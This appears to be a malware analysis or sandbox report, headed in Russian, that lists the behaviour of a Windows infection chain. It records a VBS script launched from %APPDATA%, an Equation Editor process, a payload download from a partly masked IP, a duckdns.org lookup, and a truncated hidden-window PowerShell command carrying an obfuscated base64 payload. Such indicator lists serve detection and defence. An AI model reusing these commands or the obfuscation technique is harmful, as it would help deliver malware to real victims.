Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\creambiscutlikebygirlsgood.vBS"
- %APPDATA%\creambiscutlikebygirlsgood.vbs
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\i3nmat9z\config14[1].txt
- '19#.#.109.147':80
- http://19#.#.109.147/98/creambiscutlikebygirlsgoodthingspic.gIF
- DNS ASK se######windows.duckdns.org
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J╕ ⤷ ֎ ☄ ✩Bs╕ ⤷ ֎ ☄ ✩Gk╕ ⤷ ֎ ☄ ✩bgBr╕ ⤷ ֎ ☄ ✩C╕ ⤷ ֎ ☄ ✩╕ ⤷ ֎ ☄ ✩PQ╕ ⤷ ֎ ☄ ✩g╕ ⤷ ֎ ☄ ✩Cc╕ ⤷ ֎ ☄ ✩a╕ ⤷ ֎ ☄ ✩B0╕ ⤷ ֎ ☄ ✩HQ╕ ⤷ ֎ ☄ ✩c╕ ⤷ ֎ ☄ ✩╕ ⤷ ֎ ☄ ✩6╕ ⤷ ֎ ☄ ✩C8╕ ⤷ ֎ ☄ ✩LwBz╕... (со скрытым окном)